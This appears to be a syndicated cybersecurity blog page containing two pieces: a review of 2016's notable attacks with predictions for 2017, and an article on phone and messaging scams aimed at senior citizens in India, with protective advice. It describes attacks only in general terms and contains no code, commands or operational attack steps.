Black hats have essentially turned their focus to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect as many computers as possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


Ranking the top attacks of 2016



Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of ransomware attacks, which in some cases have become particularly aggressive, as in the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of PowerShell, a system tool installed by default in Windows 10, has risen this year; it is frequently used in attacks to avoid detection by the security solutions installed on victims’ computers.

In Q2 of 2016, one of the strangest ransomware cases involved a company in Slovenia. The company’s head of security received an email from Russia informing him that their network had been compromised and that the senders were poised to launch ransomware on all of their computers if the company didn’t pay around €9000 in Bitcoin within 3 days. To prove that they did in fact have access to the organisation’s network, the hackers sent a file listing every device connected to the company’s internal network.

Ransomware as a Service (RaaS) emerged as the latest development in the ransomware industry. In Q3 we witnessed a higher level of specialisation in the ransomware trade. The best example featured the creators of the ransomware Petya and Mischa, who specialised in developing the malware and its corresponding payment platforms while leaving distribution in the hands of third parties. Once the creators have done their part, the distributors are in charge of infecting victims. Much like in the legal world, the distributors’ profit is a percentage of the money acquired: the higher the sales, the higher the percentage they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.



Mobile Devices

SNAP is one of the most talked-about vulnerabilities we’ve seen this year, affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which allowed any JavaScript to run. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update, iOS 9.3.5. This version resolves three zero-day vulnerabilities exploited by spyware known as Pegasus, developed by the NSO Group, an Israeli organisation with products similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack: researchers Andrew Tierney and Ken Munro showed a proof of concept they built to hijack a thermostat. After taking control of the thermostat (by inserting an SD card into it), they raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, using the MAC address as the identifier of every compromised device, and demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.



Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites; at least one of the attackers — identified as foreign — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014, the attack only became known recently. A total of 500 million accounts were compromised, making it the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had led 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.



POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.


Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.



Social Networks

The security of 117 million LinkedIn users was at risk after a list of email addresses and their respective passwords was published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been acquired from its servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were obtained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Ransomware

Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Companies

Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.


Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials across thousands of devices, and suffer other security flaws – all of which makes them extremely vulnerable to outside attacks.


DDoS

The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


Mobile Phones

The target is clear here as well — Android devices got the worst of it, which makes sense given that Android has the greatest market share. Focusing on a single OS makes it easier for cybercriminals to pick a target with maximal dissemination and profitability.

To complicate matters, updates do not depend only on Android’s own release schedule, but also on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the number of security issues that crop up every month, this situation only puts users at greater risk.


Cyberwarfare

We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information at a time when encryption is becoming more popular, and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

Cyber scams that target senior citizens in India


A senior citizen’s primary gadget is a mobile phone, which in earlier years was used to make/receive calls and SMSes. With rising Internet penetration, children living in different cities and countries, video calls and rising costs, senior citizens have begun to use alternate communication channels like WhatsApp and Skype. Senior citizens have become easy targets for cybercriminals given their trusting nature and poor understanding of how voice and data services work. Cybercriminals and spammers target these four types of communication channels (voice, instant messaging, SMS and internet telephony) to defraud senior citizens. The three most prevalent types of scams are:

Missed Call or One Ring Telephone Scams

The most popular one is the “missed call” scam. A missed call from an international number is made to a senior citizen’s phone. When the senior citizen calls back, the call is connected to a premium rate number where the bill rates are significantly higher, as a third-party service charge for these services is added to the bill. Senior citizens end up with large postpaid bills or find their prepaid credit wiped out. The modus operandi of these missed call scams is to ensure that once a call back is received, the caller is kept on the line for several minutes. The longer the duration, the more money the scammer makes. To do so, either the caller is looped in an interactive voice response system which tells the caller to wait while the call is connected, or the caller is connected to a recorded adult phone message. One senior citizen was so perturbed that she wanted to call the police because she heard a woman being beaten and screaming for help. Fortunately for her, she had limited prepaid credit and the call ran out. Many senior citizens become anxious and literally rush to their telecommunication service provider, only to receive a stoic response that they are not responsible for any calls made or received. To resolve the excess charges, they are advised to take up the matter with the third-party service provider, usually a dubious adult chat firm in a third world country. For the small sum of money lost, the cost of this pursuit would make it an unviable option with no guarantee of refunds.

Senior citizens can protect themselves by:

1. Restricting outbound international calling if there is no need to make overseas calls

2. Ignoring short-duration missed calls from international destinations

3. Checking the international dialling code of a missed number before returning the call; if the number originates from a country they do not expect a call from, it is best not to return it

Lottery Type Scams 

In fake lottery scams, senior citizens receive SMSes or WhatsApp messages congratulating them on having won a “big lottery” and asking them to claim their money quickly. One senior citizen thought this was a valid claim because “it was not classified as spam” by the service provider; 40% of spam is not blocked by spam filters, and spam filters only help but do not guarantee that a communication is legitimate. Once a request to redeem the claim is made, these scams always ask for either personal information or the payment of an advance fee, which, when paid, is followed by either a further request for money or the disappearance of the scamster.

Senior citizens must not share personal data online and should always refuse requests for money to process a lottery win, to release a parcel, or to send a free gift, as these are sure signs of fraudulent behaviour. Senior citizens should also consult knowledgeable family members or friends before responding.

Disclosure of Personal Information

Extracting personal information that can later be sold or used to access online bank accounts is another type of scam. Scammers pose as officials in positions of authority (banks, police, income tax) or as sellers of credit cards/personal loans, using these “roles” to exert sufficient pressure to extract personal and financial data.

Senior citizens should always remember that, however convincing the callers are, information like bank account details, financial records and passwords is never sought by authorities or banks.